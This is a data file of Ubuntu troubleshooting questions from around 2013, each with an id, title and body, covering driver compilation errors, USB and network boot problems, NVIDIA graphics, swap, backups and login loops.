367586	need help finding out what disk drive driver ubuntu needs for my dell poweredge 2950	i have a dell poweredge 2950 and im trying to install ubuntu to it . it made it to the part where it checks hardware and is telling me that no disk drive was detected and its asking for teh name of the driver needed by my disk drive . it has a list of them about 100 or so idk which could be it . tried dell and they told me what i was looking for didnt exist please help : ( im running out of options .
367587	unable to compile realtek rtl8188ce driver on ubuntu 13.10	i am trying to compile the realtek drivers on my machine and i am getting the following errors : make -c /lib/modules/3.11.0-12-generic/build m=/home/david/downloads/rtl8188ce-linux-driver modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.11.0-12-generic' cc [ m ] /home/david/downloads/rtl8188ce-linux-driver/base.o /home/david/downloads/rtl8188ce-linux-driver/base.c : in function ‘rtl_action_proc’ : /home/david/downloads/rtl8188ce-linux-driver/base.c:885:32 : error : ‘struct ieee80211_conf’ has no member named ‘channel’ rx_status.freq = hw- > conf.channel- > center_freq ; ^ /home/david/downloads/rtl8188ce-linux-driver/base.c:886:32 : error : ‘struct ieee80211_conf’ has no member named ‘channel’ rx_status.band = hw- > conf.channel- > band ; ^ /home/david/downloads/rtl8188ce-linux-driver/base.c : in function ‘rtl_send_smps_action’ : /home/david/downloads/rtl8188ce-linux-driver/base.c:1451:24 : error : ‘struct ieee80211_conf’ has no member named ‘channel’ info- > band = hw- > conf.channel- > band ; ^ make [ 2 ] : *** [ /home/david/downloads/rtl8188ce-linux-driver/base.o ] error 1 make [ 1 ] : *** [ _module_/home/david/downloads/rtl8188ce-linux-driver ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.11.0-12-generic' make : *** [ all ] error 2 how can i fix this ?
367589	backup [ how-to ] [ help ]	currently i am using ubuntu 13.10 for a few weeks . before this , i am using ubuntu 13.04 and everything is okay . when i upgraded to 13.10 , finished the installation setup and i cant login . looking all the possible solutions on the web , but nothing works , so i decided to reinstall ubuntu 13.10 and all my installed programs , settings , etc from 13.04 are gone . its been a few weeks now i 'm using ubuntu 13.10 . my point is , how can i backup my ubuntu 13.10 os , settings , programs , etc ? can you guys provide some steps ? obviously , i want to prepare for the next version of ubuntu 14.04 : ) and i do n't want to repeat installing , settings , tweaking all my systems for each version of ubuntu . extra tips from you guys are glad to hear . thanks ; ) note : using macbook air ( single os ) 64bit ubuntu 13.10
367591	gnome-mplayer lags and/or plays audio only	i installed lubuntu 13.10 on my dell inspiron mini 1018 . i used luks encryption and have a separate /home /swap and /root partition . all other applications run perfectly save gnome-mplayer . when i try to play a movie it says loading ... playing ... but the counter then says 00:00 and simply plays audio . no picture . when i attempt to close the application then it hangs and bombs out with the `` end process '' dialogue . i have attempted to reinstall it etc . all to no avail . i 'm quite sure i have the correct codecs as the same video will play quite happily on vlc media player - however my preferred app is gnome-mplayer . has anyone come across this ? is it a bug ? i have searched to see if anyone else has come across this and have found no mention elsewhere . does anyone have any other suggestions on how to fix the issue ? thanks in advance ...
367592	how do i install libfribidi-bin in ubuntu 12.04 ?	i 've tried installing libfribidi-bin from ubuntu software center , but i get this error : dpkg : regarding ... /libfribidi-bin_0.19.2-3_i386 ( 2 ) .deb containing libfribidi-bin : libfribidi-bin breaks libfribidi0 ( < < 0.19.2-3 ) libfribidi0 ( version 0.19.2-1 ) is present and installed . dpkg : error processing /home/fer/downloads/libfribidi-bin_0.19.2-3_i386 ( 2 ) .deb ( -- install ) : installing libfribidi-bin would break libfribidi0 , and deconfiguration is not permitted ( -- auto-deconfigure might help )
367593	i tried to install skype on 12.04 lts 64-bit and ended up with a 32 bit kernel . help ?	i tried to install skype on my 12.04 lts 64-bit install using the documentation here . details are below , the tl ; dr version is as follows : the skype install ( i think ) borked a video driver and caused a crash . somehow , the skype install made ubuntu think it was a 32 bit box , so when i tried to to `` recover '' after a restart , selecting the recovery boot option , and using the `` fix installed packages '' menu option , dpkg `` helpfully '' removed my 64 bit libraries/kernel and installed the 32 bit versions instead . removing skype did n't give me my 64 bit version back . how do i get my 64 bit install back ? is this just a re-install at this point ? details i tried using the documentation here . for some reason , the line sudo dpkg -- add-architecture i386 did n't work . it complained : dpkg : error : unknown option -- add-architecture bravely , naively , i went on . these commands went just fine . sudo add-apt-repository `` deb http : //archive.canonical.com/ $ ( lsb_release -sc ) partner '' sudo apt-get update & & sudo apt-get install skype i launched skype . it worked . the audio test worked fine . the video would n't work . i did some more searching . i 'm on a lenovo y510p and the camera detected as an easycam but it was just giving me a green rectangle instead of showing my video . i found this answer , so i hit fn-esc . i also double clicked on the green rectangle . oh dear lord was that a bad idea . my screen went blank . nothing was working . i used ctrl-f1 to get to a terminal ... a sea of error messages were pouring down -- i logged in ( blindly ! ) and typed killall skype the messages stopped . ( i do n't recall what they said . ) i tried ctrl-f7 back to x , but that x session was still black . i rebooted my box . it hung on an error that said something about tdms table invalid . not knowing what to do , i rebooted , went selected the rescue option from the boot loader , and tried to `` repair installed packages '' . what happened next was really weird : it installed the i386 kernel , even though this is a 64 bit box . the 32 bit kernel booted okay . i removed skype via apt-get remove skype apt-get autoremove but i ca n't get my 64 bit kernel back . how do i do that ?
367597	vpn service without having to set up vpn server ?	i want to have a vpn for my pc so people can not see my ip address and know my location , but i have n't found out a way to do so ? if i can set up a free vpn server , let me know how , because i would like to have one ! thanks !
367610	is there a way to change the delay of the tooltip on browsers ?	i do n't like the long delay for tooltip.i was wondering if there was a way to change the delay of the tooltip in chrome brower .
367612	how to remove text from file icons ?	i am fairly new to ubuntu ( linux ) . i noticed when creating a .java file or .py gives me an icon , however when i start writing code it overrides the thumbnail into showing text . is there a way to disable this silly feature ? when i installed linux mint on the vm i noticed i was able to accomplish this task by unchecking `` show text in icon '' . i know they use namo as their file manager . i read this thread and it did not work . how to stop nautilus from creating thumbnails of specific file types ?
367613	removing applications menu listing with cli command	i am trying to make an application installer item in the menu . where once you click on it , it executes the command to install the program . i can use apt-get for this and a custom launcher . however , after the application is installed , how can i make it so that it automatically removes the `` installer launcher '' once the app is installed ? forgive me if i was unclear , i was unsure how to state my question . ps : i am using the xfce ( xubuntu ) environment .
367616	cccam client in ubuntu	i have skystar2 technisat digital card , and i was having progdvb working on windows 8 i had a progdvb plugin that can connect to cccam server is there a similar way to do it in ubuntu 12.04 lts 64-bit ?
367617	how to clean /var/cache ?	when i woke up this morning , i found my root had filled overnight du -hx -- max-depth=1 / 132m /boot 4.0k /media 16k /lost+found 16m /root 702m /lib 4.0k /oldhome 8.2g /usr 73m /etc 4.0k /srv 11m /sbin 4.0k /selinux 8.0k /.config 4.0k /cdrom 4.6g /var 181m /opt 4.0k /mnt 9.3m /bin 4.0k /lib64 14g / the space is used by /var/cache/polipo ( 2.7g ) . how can i clean this up safely ? i tried restarts= > did n't work used bleachbit= > the space is not detected in the cleanup preview ps : i did rm -rf youtube inside /var/cache/polipo and it freed up 2g space . dunno if it was safe though
367621	opengl 4 support in kubuntu 13.10 with nvidia card	problem : after installing meta-utils and doing a glxinfo , i get opengl version string 3.0 . i would like to have support for opengl 4.x . i know that i need to update my nvidia driver , but my last attempts at doing so were a disaster , broke my distro , and i had to reinstall kubuntu 13.10 . ( i 'm a total linux newbie ) . specs : i have a sony vaio svf15a with a fresh install of kubuntu 13.10. lspci | grep `` vga '' returns : intel corporation 3rd gen core processor graphics controller ( rev 09 ) . lspci | grep `` 3d controller '' returns : nvidia corporation gk208m [ geforce gt 735m ] ( rev a1 ) . btw , does this mean that i have optimus technology ? attempted so far : through `` additional drivers '' of my muon software center , i 've tried activating `` nvidia binary xorg driver , kernel module and vdpau '' . after doing this and doing a glxinfo , i even lost the opengl 3.0 support that i had ! it gave me a glx error . removing this through the gui did not help . i then tried installing the nvdia-current package from my command line , it did n't fix the problem . following some instructions online , i installed the nvidia-prime package , and this just broke my distro ! sorry i ca n't be more specific , but i could n't even load kubuntu because some partition was suddenly not found ( ? ? ) help ? i would really like to get opengl 4 support but i 'm pretty terrified of doing anything now given the previous epic failure . if anyone can offer any help , i would really really appreciate it .
367623	errors with usb device during boot ?	explanation i just built a new computer . here are the specs : motherboard : gigabyte 990fxa-ud3 cpu : amd fx 8350 ssd : samsung 840 pro series mz-7pd256bw ram : g.skill f3-1600c9q-32gxm initially i tried to install linux mint 15 with xfce from a live dvd . the live dvd loaded , but my keyboard and mouse where not detected or mounted , so i could n't install it . after some googling i discovered that some of my bios settings were probably causing the problem . i enabled the network stack and the iommu controller ( described here and here ) and then usb devices started to work and i was able to install ubuntu 12.04.3 lts . but i really wanted mint 15 with xfce , so i installed that again and it worked this time ! but then i noticed that i `` could n't '' get a network connection . so then i reinstalled ubuntu again . after installing ubuntu , i realized that for some reason or another the automatic dhcp was n't working . i switched it to a manual configuration , and after rebooting the computer ( not sure why i had to reboot to get the config to work ) i had network connectivity . well geez , i still wanted mint , so i reinstalled yet again ! long story short - i now have mint 15 with xfce up and running . but its still not perfect . the boot time takes forever and there is no indication that the computer is booting other than the color of the led on my monitor . the screen is black , no graphical information whatsoever indicating the os is loading . after waiting a few minutes ( i have n't timed it but i think its about 4 or 5 minutes ) i finally get the login screen . but when i try to use the usb keyboard or mouse , they still do n't work . i know this sounds confusing because i said everything is up and running . well , the problem is that i have to wait somewhere between 1 to 2 minutes before the keyboard and mouse are functional . i can live with this , but it feels like something still is n't working right . i get the same results with mint 15 and ubuntu 12.04.3 lts . i made sure the motherboard has the latest bios installed . i tried to update the drivers for the lan , realtek 8111e ( the website says `` linux driver for kernel 3.x and 2.6.x and 2.4.x '' ) but when i untar r8168-8.037.00.tar.bz2 the readme file states `` kernel source tree ( supported linux kernel 2.6.x and 2.4.x ) '' so i did n't install it because i 'm running : $ uname -a linux bugger 3.8.0-25-generic # 37-ubuntu smp thu jun 6 20:47:07 utc 2013 x86_64 x86_64 x86_64 gnu/linux here are snipets from /var/log/syslog . i just included the parts pertinent to the warnings or errors that are reported : ... oct 27 19:34:07 bugger kernel : [ 1.531599 ] amd-vi : event logged [ io_page_fault device=01:00.0 domain=0x0014 address=0x00000000be9f9880 flags=0x0010 ] oct 27 19:34:07 bugger kernel : [ 1.850302 ] usb 3-2 : new high-speed usb device number 2 using ehci-pci oct 27 19:34:07 bugger kernel : [ 16.912757 ] usb 3-2 : device descriptor read/64 , error -110 oct 27 19:34:07 bugger kernel : [ 18.217346 ] xhci_hcd 0000:01:00.0 : ca n't setup oct 27 19:34:07 bugger kernel : [ 18.217348 ] xhci_hcd 0000:01:00.0 : usb bus 8 deregistered oct 27 19:34:07 bugger kernel : [ 18.217375 ] switching to clocksource tsc oct 27 19:34:07 bugger kernel : [ 18.217377 ] xhci_hcd 0000:01:00.0 : init 0000:01:00.0 fail , -110 oct 27 19:34:07 bugger kernel : [ 18.217379 ] xhci_hcd : probe of 0000:01:00.0 failed with error -110 ... oct 27 19:34:07 bugger kernel : [ 19.795759 ] [ drm ] initialized nouveau 1.1.0 20120801 for 0000:03:00.0 on minor 0 oct 27 19:34:07 bugger kernel : [ 32.079049 ] usb 3-2 : device descriptor read/64 , error -110 oct 27 19:34:07 bugger kernel : [ 32.294288 ] usb 3-2 : new high-speed usb device number 3 using ehci-pci oct 27 19:34:07 bugger kernel : [ 47.356778 ] usb 3-2 : device descriptor read/64 , error -110 oct 27 19:34:07 bugger kernel : [ 62.522954 ] usb 3-2 : device descriptor read/64 , error -110 oct 27 19:34:07 bugger kernel : [ 62.738247 ] usb 3-2 : new high-speed usb device number 4 using ehci-pci oct 27 19:34:07 bugger kernel : [ 73.112154 ] usb 3-2 : device not accepting address 4 , error -110 oct 27 19:34:07 bugger kernel : [ 73.223791 ] usb 3-2 : new high-speed usb device number 5 using ehci-pci oct 27 19:34:07 bugger kernel : [ 83.597693 ] usb 3-2 : device not accepting address 5 , error -110 oct 27 19:34:07 bugger kernel : [ 83.597715 ] hub 3-0:1.0 : unable to enumerate usb device on port 2 oct 27 19:34:07 bugger kernel : [ 83.733056 ] xor : automatically using best checksumming function : oct 27 19:34:07 bugger kernel : [ 83.769049 ] avx : 5053.000 mb/sec oct 27 19:34:07 bugger kernel : [ 83.770733 ] device-mapper : dm-raid45 : initialized v0.2594b oct 27 19:34:07 bugger kernel : [ 83.792131 ] btrfs loaded oct 27 19:34:07 bugger kernel : [ 83.813183 ] ext4-fs ( sda1 ) : mounted filesystem with ordered data mode . opts : ( null ) oct 27 19:34:07 bugger kernel : [ 83.872709 ] usb 5-3 : new full-speed usb device number 2 using ohci_hcd oct 27 19:34:07 bugger kernel : [ 83.938145 ] adding 33516540k swap on /dev/sda5 . priority : -1 extents:1 across:33516540k ss oct 27 19:34:07 bugger kernel : [ 83.958737 ] ext4-fs ( sda1 ) : re-mounted . opts : errors=remount-ro oct 27 19:34:07 bugger kernel : [ 83.983172 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready oct 27 19:34:07 bugger kernel : [ 84.009284 ] lp : driver loaded but no devices found oct 27 19:34:07 bugger kernel : [ 84.033058 ] usb 5-3 : new usb device found , idvendor=0557 , idproduct=7000 oct 27 19:34:07 bugger kernel : [ 84.033064 ] usb 5-3 : new usb device strings : mfr=0 , product=0 , serialnumber=0 oct 27 19:34:07 bugger kernel : [ 84.035104 ] hub 5-3:1.0 : usb hub found oct 27 19:34:07 bugger kernel : [ 84.037248 ] hub 5-3:1.0 : 4 ports detected oct 27 19:34:07 bugger bluetoothd [ 626 ] : bluetooth daemon 4.101 oct 27 19:34:07 bugger bluetoothd [ 626 ] : starting sdp server oct 27 19:34:07 bugger bluetoothd [ 626 ] : dis can not start : gatt is disabled oct 27 19:34:07 bugger bluetoothd [ 626 ] : failed to init deviceinfo plugin oct 27 19:34:07 bugger bluetoothd [ 626 ] : failed to init proximity plugin oct 27 19:34:07 bugger bluetoothd [ 626 ] : failed to init time plugin oct 27 19:34:07 bugger bluetoothd [ 626 ] : failed to init alert plugin oct 27 19:34:07 bugger bluetoothd [ 626 ] : failed to init thermometer plugin oct 27 19:34:07 bugger kernel : [ 84.064980 ] bluetooth : core ver 2.16 oct 27 19:34:07 bugger kernel : [ 84.064995 ] net : registered protocol family 31 oct 27 19:34:07 bugger kernel : [ 84.064996 ] bluetooth : hci device and connection manager initialized oct 27 19:34:07 bugger kernel : [ 84.065002 ] bluetooth : hci socket layer initialized oct 27 19:34:07 bugger kernel : [ 84.065005 ] bluetooth : l2cap socket layer initialized oct 27 19:34:07 bugger kernel : [ 84.065009 ] bluetooth : sco socket layer initialized oct 27 19:34:07 bugger bluetoothd [ 626 ] : failed to init gatt_example plugin ... oct 27 19:34:07 bugger networkmanager [ 979 ] : < info > monitoring kernel firmware directory '/lib/firmware ' . oct 27 19:34:07 bugger networkmanager [ 979 ] : < info > wifi hardware radio set enabled oct 27 19:34:07 bugger networkmanager [ 979 ] : < info > wifi enabled by radio killswitch ; enabled by state file oct 27 19:34:07 bugger networkmanager [ 979 ] : < info > wwan enabled by radio killswitch ; enabled by state file oct 27 19:34:07 bugger networkmanager [ 979 ] : < info > wimax enabled by radio killswitch ; enabled by state file oct 27 19:34:07 bugger networkmanager [ 979 ] : < info > networking is enabled by state file oct 27 19:34:07 bugger networkmanager [ 979 ] : < warn > failed to allocate link cache : ( -10 ) operation not supported oct 27 19:34:07 bugger networkmanager [ 979 ] : < info > ( eth0 ) : carrier is off oct 27 19:34:07 bugger networkmanager [ 979 ] : < info > ( eth0 ) : new ethernet device ( driver : 'r8169 ' ifindex : 2 ) oct 27 19:34:07 bugger networkmanager [ 979 ] : < info > ( eth0 ) : exported as /org/freedesktop/networkmanager/devices/0 oct 27 19:34:07 bugger networkmanager [ 979 ] : < info > ( eth0 ) : device state change : unmanaged - > unavailable ( reason 'managed ' ) [ 10 20 2 ] oct 27 19:34:07 bugger networkmanager [ 979 ] : < info > ( eth0 ) : bringing up device . oct 27 19:34:07 bugger networkmanager [ 979 ] : < info > monitoring kernel firmware directory '/lib/firmware ' . oct 27 19:34:07 bugger networkmanager [ 979 ] : < info > wifi hardware radio set enabled oct 27 19:34:07 bugger networkmanager [ 979 ] : < info > wifi enabled by radio killswitch ; enabled by state file oct 27 19:34:07 bugger networkmanager [ 979 ] : < info > wwan enabled by radio killswitch ; enabled by state file oct 27 19:34:07 bugger networkmanager [ 979 ] : < info > wimax enabled by radio killswitch ; enabled by state file oct 27 19:34:07 bugger networkmanager [ 979 ] : < info > networking is enabled by state file oct 27 19:34:07 bugger networkmanager [ 979 ] : < warn > failed to allocate link cache : ( -10 ) operation not supported oct 27 19:34:07 bugger networkmanager [ 979 ] : < info > ( eth0 ) : carrier is off oct 27 19:34:07 bugger networkmanager [ 979 ] : < info > ( eth0 ) : new ethernet device ( driver : 'r8169 ' ifindex : 2 ) oct 27 19:34:07 bugger networkmanager [ 979 ] : < info > ( eth0 ) : exported as /org/freedesktop/networkmanager/devices/0 oct 27 19:34:07 bugger networkmanager [ 979 ] : < info > ( eth0 ) : device state change : unmanaged - > unavailable ( reason 'managed ' ) [ 10 20 2 ] oct 27 19:34:07 bugger networkmanager [ 979 ] : < info > ( eth0 ) : bringing up device . ... oct 27 19:34:08 bugger ntpdate [ 1265 ] : ca n't find host ntp.ubuntu.com : system error ( -11 ) oct 27 19:34:08 bugger ntpdate [ 1265 ] : no servers can be used , exiting oct 27 19:34:08 bugger mdm [ 1277 ] : warning : plymouth is running , asking it to stop ... oct 27 19:34:08 bugger mdm [ 1277 ] : warning : plymouth stopped oct 27 19:34:08 bugger acpid : client connected from 1335 [ 0:0 ] oct 27 19:34:08 bugger acpid : 1 client rule loaded oct 27 19:34:08 bugger kernel : [ 84.925348 ] input : hda nvidia hdmi/dp , pcm=9 as /devices/pci0000:00/0000:00:0b.0/0000:03:00.1/sound/card1/input10 oct 27 19:34:08 bugger kernel : [ 84.925422 ] input : hda nvidia hdmi/dp , pcm=8 as /devices/pci0000:00/0000:00:0b.0/0000:03:00.1/sound/card1/input11 oct 27 19:34:08 bugger kernel : [ 84.925480 ] input : hda nvidia hdmi/dp , pcm=7 as /devices/pci0000:00/0000:00:0b.0/0000:03:00.1/sound/card1/input12 oct 27 19:34:08 bugger kernel : [ 84.925540 ] input : hda nvidia hdmi/dp , pcm=3 as /devices/pci0000:00/0000:00:0b.0/0000:03:00.1/sound/card1/input13 oct 27 19:34:08 bugger mdm [ 1277 ] : warning : failed to get file info for accountservice pic file : error when getting information for file '/var/lib/accountsservice/icons/axiopisty ' : no such file or directory oct 27 19:34:08 bugger mdm [ 1277 ] : warning : failed to get file info for accountservice pic file : error when getting information for file '/home/axiopisty/.face ' : no such file or directory oct 27 19:34:08 bugger mdm [ 1277 ] : glib-gio-critical : g_file_info_get_attribute_uint64 : assertion `g_is_file_info ( info ) ' failed oct 27 19:34:08 bugger mdm [ 1277 ] : glib-gio-critical : g_file_info_get_attribute_uint64 : assertion `g_is_file_info ( info ) ' failed ... oct 27 19:34:10 bugger networkmanager [ 979 ] : < warn > dnsmasq not available on the bus , ca n't update servers . oct 27 19:34:10 bugger networkmanager [ 979 ] : < error > [ 1382924050.590066 ] [ nm-dns-dnsmasq.c:402 ] update ( ) : dnsmasq owner not found on bus : could not get owner of name 'org.freedesktop.networkmanager.dnsmasq ' : no such name oct 27 19:34:10 bugger networkmanager [ 979 ] : < warn > dns : plugin dnsmasq update failed oct 27 19:34:10 bugger networkmanager [ 979 ] : < info > writing dns information to /sbin/resolvconf ... oct 27 19:34:19 bugger kernel : [ 99.525358 ] usb 7-2 : device descriptor read/64 , error -110 oct 27 19:34:26 bugger networkmanager [ 979 ] : < info > ( eth0 ) : ip6 addrconf timed out or failed . oct 27 19:34:26 bugger networkmanager [ 979 ] : < info > activation ( eth0 ) stage 4 of 5 ( ipv6 configure timeout ) scheduled ... oct 27 19:34:26 bugger networkmanager [ 979 ] : < info > activation ( eth0 ) stage 4 of 5 ( ipv6 configure timeout ) started ... oct 27 19:34:26 bugger networkmanager [ 979 ] : < info > activation ( eth0 ) stage 4 of 5 ( ipv6 configure timeout ) complete . oct 27 19:34:35 bugger kernel : [ 114.715442 ] usb 7-2 : device descriptor read/64 , error -110 oct 27 19:34:35 bugger kernel : [ 114.954663 ] usb 7-2 : new full-speed usb device number 3 using ohci_hcd oct 27 19:34:50 bugger kernel : [ 130.041088 ] usb 7-2 : device descriptor read/64 , error -110 oct 27 19:35:05 bugger kernel : [ 145.231222 ] usb 7-2 : device descriptor read/64 , error -110 oct 27 19:35:06 bugger kernel : [ 145.470436 ] usb 7-2 : new full-speed usb device number 4 using ohci_hcd oct 27 19:35:16 bugger kernel : [ 155.844341 ] usb 7-2 : device not accepting address 4 , error -110 oct 27 19:35:16 bugger kernel : [ 155.979888 ] usb 7-2 : new full-speed usb device number 5 using ohci_hcd oct 27 19:35:27 bugger kernel : [ 166.353805 ] usb 7-2 : device not accepting address 5 , error -110 oct 27 19:35:27 bugger kernel : [ 166.353824 ] hub 7-0:1.0 : unable to enumerate usb device on port 2 oct 27 19:35:27 bugger kernel : [ 166.553694 ] usb 5-3.1 : new low-speed usb device number 3 using ohci_hcd oct 27 19:35:27 bugger kernel : [ 166.728143 ] usb 5-3.1 : new usb device found , idvendor=045e , idproduct=00db oct 27 19:35:27 bugger kernel : [ 166.728150 ] usb 5-3.1 : new usb device strings : mfr=1 , product=2 , serialnumber=0 oct 27 19:35:27 bugger kernel : [ 166.728156 ] usb 5-3.1 : product : natural速 ergonomic key oct 27 19:35:27 bugger kernel : [ 166.728160 ] usb 5-3.1 : manufacturer : microsoft oct 27 19:35:27 bugger mtp-probe : checking bus 5 , device 3 : `` /sys/devices/pci0000:00/0000:00:13.0/usb5/5-3/5-3.1 '' oct 27 19:35:27 bugger mtp-probe : bus : 5 , device : 3 was not an mtp device oct 27 19:35:27 bugger kernel : [ 166.824938 ] usbcore : registered new interface driver usbhid oct 27 19:35:27 bugger kernel : [ 166.824943 ] usbhid : usb hid core driver ... oct 27 21:19:55 bugger xscreensaver : pam_ecryptfs : seteuid error ... oct 28 08:44:31 bugger xscreensaver : pam_ecryptfs : seteuid error ... oct 28 15:47:38 bugger kernel : [ 72659.857778 ] nspluginwrapper [ 15024 ] : segfault at 7f856cdf91aa ip 00007f85730d97d6 sp 00007fff8719d3c8 error 4 in libc-2.17.so [ 7f8572fa0000+1bf000 ] ... oct 28 16:10:05 bugger networkmanager [ 979 ] : < error > [ 1382998205.711047 ] [ nm-system.c:145 ] nm_system_device_set_ip4_route ( ) : ( tun0 ) : failed to set ipv4 route : object exists oct 28 16:10:05 bugger networkmanager [ 979 ] : < error > [ 1382998205.711229 ] [ nm-system.c:145 ] nm_system_device_set_ip4_route ( ) : ( tun0 ) : failed to set ipv4 route : object exists oct 28 16:10:05 bugger networkmanager [ 979 ] : < error > [ 1382998205.711388 ] [ nm-system.c:145 ] nm_system_device_set_ip4_route ( ) : ( tun0 ) : failed to set ipv4 route : object exists ... oct 28 18:32:30 bugger networkmanager [ 979 ] : < warn > dns : plugin dnsmasq update failed ... oct 28 18:32:50 bugger networkmanager [ 979 ] : < info > ( eth0 ) : ip6 addrconf timed out or failed . to be clear , the lan is hit and miss . sometimes it works ( with manual configuration , not with auto dhcp ) after starting the computer , and sometimes it does not . the usb devices will work , after waiting about 2 minutes after the login screen apears . but if both the usb devices and the lan are working after a system boot , then they seem to work fine ... until the next time the system boots up again . its just hit and miss . question as can be seen from the log file , i 'm still having problems with the usb and lan devices . how can i fix these problems ? maybe some other bios settings , other drivers , or maybe submit a bug somewhere ? thanks . edit i used a stopwatch to know the boot/mouse ready times . boot time : 1:53.50 mouse time : 1:22.16 total time : 3:15.66 this means from the time i pressed the power on button to the time i got a login screen it took 1:53 . then it took an additional 1:22 before the mouse and keyboard were operational ( with `` ohci_hcd '' usb 1.0 support rather that `` ehci-pci '' usb 2.0 support ) . the total time before i could log into the machine was 3:15 . is 1:53 a normal amount of time for the os to boot given the specified hardware ?
367624	unable to enumerate usb port	i 'm running ubuntu 13.10 and when i start up i notice that is says unable to enumerate usb port 3 . i use that port for a usb stick for wifi . when i first get on to my name i have to unplug the usb stick and plug it back in to get it going . is there a way i can do this manually from my computer without having to physically unplug and re-plug it in or is that just something i 'll have to deal with ?
367625	ubuntu recovery mode garbled screen , normal boot is fine	if i chose to boot in recovery mode , the screen comes out garbled . black mostly , with some white noise at the top ( which i think is a console , mangled beyond recognition ) and a purple rectangle to the left . if i boot not in recovery mode - it works fine . is there anything i can do to fix this , or should i not worry ( as normal mode works ) ? i 'm testing recovery mode as it 's one of the steps on this question : how can i install ubuntu encrypted with luks with dual-boot ? the machine is a dell xps 15 laptop ( l521x ) so i think it has nvidia graphics ( nvidia速 geforce速 gt 640m ) as well as onboard intel graphics .
367627	internet lost on ubuntu 13.10 when notebook closes	as soon as i close my laptop and reopen it later my wi-fi cuts out . i have gone to the drop down menu and clicked `` enable networking '' tried some other things in settings , but the only way to get my wi-fi back on is to restart the computer . this started happening after i upgraded to 13.10 from 13.04 . has anyone had a similar issue ?
367628	wo n't let me change permissions	when i was trying to open scp containment breach the options only say open , extract , rename , delete , etc . but does not say permissions what do i do . usually it has permissions shown at the bottom but it is not listed .
367630	higher laptop temperatures in ubuntu 13.10	a week ago , i upgraded from kubuntu 13.04 to 13.10 . since then , the fans have been running a lot more , and the 5 temperature sensors have been at 70-80c . the laptop is a lenovo t430s that was purchased new in december 2012 . any idea what could be causing this , or how i can go about diagnosing the increased temperature ?
367632	no operating system found with liveusb	i want to install ubuntu 13.10 for my studies on my asus f75v with windows 8 preinstalled . after many tries , i finally manage to boot on my liveusb but ... the only message i got is `` no operating system found '' . i tried lili usb creator , unetbootin , nothing change . i tried also with different .iso and usb key , and the result is the same . if you ask for it , i deactivated bootsecure , fast boot and whatever which could prevent the installation . is it exist a way to install ubuntu in dualboot with windows 8.1 and , if yes , could you please explain the entire steps i have to do to install it ? i hope i do n't have to use a live dvd , but if it 's the only way , i 'll do ... thanks in advance , in hope that you 'll write to me fast . ( sorry for my bad english , i 'm french . but i think i could have more information with english people than french people . ) edit : i finally manage to boot on my usb key and try ubuntu ... thanks to hp usb disk storage format tool , maybe . i do n't really know , i hide the data with lili in the same time , but the principal is i can finally install ubuntu . but i think it 's not over . i 'll tell you if after the installation it boot normally or not .
367633	swap problem in ubuntu 12.04	having problem with swap . actually , in the system monitor it shows swap is not available , and then i installed gparted partition editor . there is a partition named /dev/sda7 and file system is linux-swap . i turned on swap from there and now everything becomes correct but when i reboot it is unable to persist the change . again it is showing no swap in the system monitor .
367643	gstreamer 0.10.21 - how to update faad decoder version from 0.10.22.3 to 0.10.23	how to only update one decoder ? i have one hardware which is using echo cancel + noise reduction , when i use decoder faad version 0.10.22.3 it does not work even using webrtc or pj echo . i need to debug many things but cant update the faad decoder from 0.10.22.3 to 0.10.23 . any idea how to update it from using apt-get only the faad or all gst-plugin-bad ? # gst-launch-0.10 -- version gst-launch-0.10 version 0.10.36 gstreamer 0.10.36 https : //launchpad.net/distros/ubuntu/+source/gstreamer0.10 existing version which is unstable : # gst-inspect-0.10 faad | grep version version : 0.10.22.3 best/stable version to install : # gst-inspect-0.10 faad | grep version version : 0.10.23
367646	is it possible to unbind or change the unicode input global shortcut ?	i 'm using ubuntu 13.10 , but i think the keyboard shortcut was n't bound in 12.10 , but could be wrong . it 's not in the shortcuts tab of keyboard settings . how can i change the unicode input from ctrl + alt + u to other ?
367647	new to ubuntu 13.10	i 'm new to ubuntu and ubuntu 13.10 . this is my first time using linux distro . i 'm having problems with my graphic cards . it seems that my nvidia geforce gt540m card is n't detected by ubuntu . i 've also tried installing nvidia-prime and nvidia-current , but i got black screen after login . can anyone help me to solve this problem ? thanks a lot . : d
367648	wifi connection issues	i am running 12.04.3 it lists my wifi networks but can non connect to it . how do i know if it configed right ? what is step 1 to diagnose ?
367649	error : no such partition after 11.10 upgrade to 12.04	-i recently upgraded my 11.10 install to 12.04 lts and got the above error message upon reboot after a gnu grub version ubuntu3 display showing ubuntu 3.2.0-23-generic pae and other kernels or memory tests to choose from . the upgrade had to be done by cd because the update manager did not show the 12.04 upgrade option . after selecting the default install option of upgrading 11.10 to 12.04 , i was presented with a screen saying that i had not specified a swap partition . upon seselecting the 'back ' key , i was taken to a partition page which listed two logical drives on one partition ( only ubuntu 11.10 had been installed - no windoz ) : an ext4 bootable drive plus a small 1.8gb drive . i double clicked the small drive and selected it as the swap partition falsely believing the logical drives to be partitions . i can see the two user folders under home from the file manager screen while runnning 12.04 from the cd but if i try to access either one an error message is displayed saying i do not have permission while i get a loading message in the lower right corner of the window that does not go away . the hard drive map now shows a swap partition overlayed on the small logical drive but not on a physical boundary . i have 4 questions : can i access the user folders in sda1 prior to recovery via the terminal running the live cd ? if so how ? how do i remove the swap partition ? how do i add a swap partition properly ? will boot-repair work after fixing the swap partition issue ?
367650	after upgrade from 13.04 to 13.10 missing user in login screen	i have upgraded to 13.10 from 13.04 now after booting ( even after updates and rebooting ) my user id is not listed . it has a uid higher than the minimum in lightdm.conf . i have the user light display manager , guest , and remote login options in the login screen but not my ususal user id that i have been using from ubuntu 9 something . it is a normal user and an administrator so that i could authorize drivers , updates , etc ... i do not have any custom display manager setup . it has been standard unity since unity was available . i can login to my account by logging in as guest opening a termial and using su - user any insight would be appreciated . thanks
367651	13.04 - endless login loop	i do n't know what i did other than stupidly typing 'startx ' in a ctrl + alt + f2 terminal . now , when i shutdown , it went to login screen . i thought wierd and tried to log back in and got stuck in and endless loop to the point where i forced a shutdown . a reinstall is not an option please help ?
367652	how can i add times new roman with ipa extensions ?	i 'm looking for an easy way to install the times new roman font ( which i need for my dissertation ) that has the ipa extensions . the one that comes with the ttf-mscorefonts-installer does not have them , and i was hoping that someone here would know which version does .
367656	flash drive does n't automount	i have automount and automount-open parameters set up in org.gnome.desktop.media-handling . tried all usb ports , usb is fat32 formatted . mounting through the terminal works , also founded more comfortable way of mounting , using disks window , but still automounting would be better .
